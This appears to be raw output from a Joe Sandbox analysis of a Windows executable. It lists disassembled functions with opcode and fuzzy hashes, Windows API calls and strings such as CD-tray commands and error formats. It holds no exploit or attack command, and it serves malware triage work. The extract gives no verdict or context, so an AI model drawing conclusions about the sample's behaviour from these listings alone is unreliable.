                                                                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                          Similarity
                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                          • String ID: 0
                                                                          • API String ID: 1441871840-4108050209
                                                                          • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                          • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          • API String ID: 3631882475-2268648507
                                                                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                          • SendMessageW.USER32 ref: 00471740
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                          • SendMessageW.USER32 ref: 0047184F
                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                          Similarity
                                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          • API String ID: 4116747274-0
                                                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                          • _wcslen.LIBCMT ref: 00461683
                                                                          • __swprintf.LIBCMT ref: 00461721
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                          • GetParent.USER32(?), ref: 004618C3
                                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                          Similarity
                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                          • String ID: %s%u
                                                                          • API String ID: 1899580136-679674701
                                                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu$Sleep
                                                                          • String ID: 0
                                                                          • API String ID: 1196289194-4108050209
                                                                          • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                          • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                          • String ID: (
                                                                          • API String ID: 3300687185-3887548279
                                                                          • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                          • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                          APIs
                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 1976180769-4113822522
                                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                          • String ID:
                                                                          • API String ID: 461458858-0
                                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3969911579-0
                                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                          • String ID: 0
                                                                          • API String ID: 956284711-4108050209
                                                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 1965227024-3771769585
                                                                          • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                          • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_memmove_wcslen
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          • API String ID: 369157077-1007645807
                                                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00445BF8
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                          • __wcsicoll.LIBCMT ref: 00445C33
                                                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 3125838495-3381328864
                                                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                          APIs
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          Similarity
                                                                          • API ID: MessageSend$CharNext
                                                                          • String ID:
                                                                          • API String ID: 1350042424-0
                                                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                          APIs
                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                          • _wcscpy.LIBCMT ref: 004787E5
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 3052893215-2127371420
                                                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                          • __swprintf.LIBCMT ref: 0045E7F7
                                                                          • _wprintf.LIBCMT ref: 0045E8B3
                                                                          • _wprintf.LIBCMT ref: 0045E8D7
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-2354261254
                                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
